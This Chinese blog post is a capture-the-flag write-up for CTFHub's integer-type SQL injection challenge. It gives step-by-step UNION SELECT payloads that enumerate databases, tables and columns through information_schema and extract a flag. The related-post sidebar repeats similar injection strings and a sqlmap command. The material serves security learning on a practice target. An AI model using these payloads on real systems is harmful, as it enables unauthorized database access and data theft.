【ctfhub】SQL注入整数型注入

于 2022-10-05 09:33:30 发布
阅读量174 收藏
点赞数
分类专栏: ctf 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/manerzi/article/details/127169156
版权

题目描述

在这里插入图片描述输个1试试
在这里插入图片描述
我们先判断查询返回了多少列

在这里插入图片描述在这里插入图片描述可以确定返回2列
接下来我们按照顺序联合查询库名、表名、列名
联合查询库名

-1 union select 1,group_concat(schema_name) from information_schema.schemata

在这里插入图片描述
我们猜测再sqli库中,接下来联合查询表名

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

在这里插入图片描述
显然肯定在flag表中,接下来我们联合查询列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' && table_name='flag'

在这里插入图片描述最后我们查询flag表下的flag字段

-1 union select 1,group_concat(flag) from flag

在这里插入图片描述成功得到flag

小萨摩!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFHub - 整数型注入
Have_a_great_day的博客
09-07 353
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
ctfhub SQL 整数型注入
qq_52671379的博客
06-21 308
SQL 整数型注入 题目 当输入值为1或2时有回显 当输入3时无回显 判断是否存在注入 加单引号 对应的id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,无回显。 作为sql注入的小白,我决定不采用大佬们的方法,看不懂,先分享自己的方法,非常传统。 由以上得知有两个字段,所以第一步,爆库名; '' union select 1,database() # 第二,爆表名; '' union select 1,group_concat(table_name) from information_
CTFHub-sql注入-整数型注入
qq_54537919的博客
07-22 885
CTFHub-sql注入-整数型注入
Ctfhub-sql注入整数型
soysauce123的博客
08-03 1001
这样我们就很清楚一个库的库名,表名和字段名就可以直接查找里面的数据。先尝试看看一共有几列,当道三的时候发现不返回了说明只有两列。发现有老多库了,我们就大胆猜测从我们本来就在的库里面查找。于是使用函数获得此表里面的带有flag的字段名。小白承认这题对于我来说是一个练手的题目【嘿嘿】身为一名小白我们先预习一下今天要用到的知识。接下来就可以查询一下我们现在在什么库。我们肯定要的是flag里面的数据对吧。然后我们就可以输入flag通过本题啦。然后我们再尝试看看一共有什么库用到。欸,发现我们在sqli里面。.....
ctfhub Sql整数型注入
m0_64078007的博客
03-11 235
我们打开文件发现了它提示我们输入一个“1”,我们尝试输入。 我们发现它可以有回显,根据它的提示我们尝试整数注入类型。 select * from news where id = 1 and 1=1 select * from news where id = 1 and 1=2 当我们尝试到第三个时,它爆字段了。 ...
CTFHub SQL 整数型注入
weixin_44732566的博客
02-16 3242
CTFHub SQL 整数型注入 之前那道整数型注入题改了,,,但还是一样的套路,数据库也一样,就多了一个:前端页面回显位置只有两处,而且一个正确的id回显就占了两处地方 UI界面好看了,还多了一个问题,就是前端页面一次只显示一条数据库记录 所以在payload最后加上limit x offset y 这个意思是从第y条记录开始后x条记录,y是从0开始算的 1 or 1=1 limit 1 o...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL 注入天书.pdf
08-06
SQL 注入学习天书
pangolinsdl—sql注入工具
06-20
pangolinsdl—sql注入工具 很好用的sql注入工具 界面简洁好用 使用方便
ctfhubSQL整数型注入(借助sqlmap工具)
hwy2506451901的博客
04-05 992
关于这道题呢,我还没有看到用sqlmap工具解答的,正好刚刚做完,感觉还挺简单的,所以决定分享一下过程,大佬可以绕过啦嘿嘿嘿,大家也可以去下载一个试试这个工具,希望能有一点帮助吧! 我们启动环境,进入网址看到让我们输入一个1试试,那我们就输入试试吧 可以看到我们输入的id写在了地址栏当中,说明采用的提交方式是get,下面就详细介绍这道题采用sqlmap的解法: 1.检查是否存在漏洞: 将地址栏的...
CTFHub-web(SQL整数型注入)
分享与记录
03-26 386
上题 按照提示输入1 尝试知道有几个字段,先传入1 order by 2,回显正常 然后1 order by 3,根据回显可得知只有两个字段 找注入点 得知1,2均为注入点 知道了当前数据库名,便可查询出表名 0 union select 1,group_concat(table_name) from information_schema.tables where table_sche...
CTFHub 整数型SQL注入
Leon~博客
03-08 5648
1、整数型SQL注入 (1)判断是否存在注入 1)加单引号 URL:http://challenge-4334fe95b292f4f7.sandbox.ctfhub.com:10080/?id=1’ 对应的sqlselect * from table where id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常; 2)加and 1=1 URL:http:...
ctfhub-SQL注入-SQL整数型注入
qq_46222050的博客
09-01 670
做这个题目前,建议去B站看一下SQL注入的视频,挺基础的,也有了解。 2020最新Java老王带你了解SQL注入(配套源码+笔记) 关键字/语句/函数 解释 union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多
CTFHub SQL 整数型注入[四步]
luminous_you的博客
12-04 433
判断列数 1 order by 2 判断回显点 1 union select 1,2 判断表名列名 -1 union select 1,group_concat(table_name,'_',column_name) from information_schema.columns where table_schema=database() 得出结果【两种方法】 -1 union select 1,flag from sqli.flag limit 0,1 -1 union select 1,(se
CTFCTFHub------web-SQL注入-整数型注入
从零开始的网安生活
07-23 379
文章目录SQL注入整数型注入 SQL注入 整数型注入 1.打开链接根据提示输入1 1.先检查数据库有无注入点 python sqlmap.py -u http://challenge-7a209e58efdf655a.sandbox.ctfhub.com:10080/?id=1 得到 GET parameter 'id' is vulnerable. ...
[CTFHub]整数型注入(web>SQL注入
ZXW_NUDT的博客
05-12 287
输入1后发现url改变 使用order by语句查询字段数 使用union联合查询检测信息回显位置 由于页面只允许返回一行内容,所以则修改参数1为-1,使需要查询的信息回返 获取当前数据库名 获取所有数据库名 查询数据库sqli表名 获取flag列所有字段名 获取指定数据库的表的列的内容 ...
CTFHub-整数型注入-wp
z1moq的博客
05-09 248
整数型注入 由题目知此SQL注入整数型注入,则在注入命令执行时无闭合字符 输入1 得到 ID=1 的正常返回结果 输入1+1 得到 ID=2 的正常返回结果,说明存在SQL注入 分别输入 1 order by 1 1 order by 2 返回结果正常 输入 1 order by 3 时无法返回正常值,所以可以判断该网页输出字段数为2 输入 -1 union select 1,database() 获取库名 输入 -1 union select 1,group_con
ctfhub sql注入
最新发布
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值